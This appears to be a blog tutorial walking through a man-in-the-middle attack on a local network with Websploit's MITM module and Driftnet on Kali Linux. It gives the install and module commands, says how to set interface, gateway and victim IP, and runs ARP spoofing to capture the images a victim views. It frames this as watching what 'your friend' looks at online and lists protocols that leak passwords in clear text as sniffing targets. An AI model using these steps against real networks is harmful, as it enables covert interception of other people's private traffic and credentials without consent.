How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.
MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.
Step 1: Need to install websploit in Kali if not present.
root@kali:~# apt-get install websploit
Step2: To Run the websploit
root@kali:~# websploit
Step 3: Next we need to list the modules with the websploit.
wsf > show modules
data:image/s3,"s3://crabby-images/251f8/251f8ce94f745b8508e5a469655a83f9a969c49e" alt="Driftnet - Tool used to capture images"
Step 4: Need to select network/mitm under Network modules.
wsf > use network/mitm
wsf:MITM > show options
data:image/s3,"s3://crabby-images/a8b2e/a8b2e3a5dafb1fc9c130cfd2c5cbbc3c635d8ec6" alt="Driftnet - Tool used to capture images"
Interface: Need to specify the network adapter interface based on our network adapter.
- set Interface eth0
- set Interface wlan0
Router: Need to specify Router IP, which can be found with the command route -n.
set Router (Gateway IP)
Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.
data:image/s3,"s3://crabby-images/d7ca6/d7ca6f3a5c7088ca0e8a5a1bdf91577428078d98" alt="Driftnet - Tool used to capture images"
Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.
wsf:MITM > run
data:image/s3,"s3://crabby-images/3314b/3314b88a9b537e786154c4c0aba207097099cb06" alt="Driftnet - Tool used to capture images"
Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.
data:image/s3,"s3://crabby-images/d5bd1/d5bd167392d370dbec009f57a983fd7688e03baf" alt="Driftnet - Tool used to capture images"
Here you can find the pictures that your friend watching online.
Protocols Vulnerable to Sniffing
- HTTP: Sends passwords in clear text
- TELNET: Transfer commands in plain text
- SNMP: Sends passwords in clear text
- POP: Sends passwords in clear text
- FTP: Sends passwords in clear text
- NNTP: Sends passwords in clear text
- IMAP: Sends passwords in clear text
If you have any doubt please don’t hesitate to leave a comment.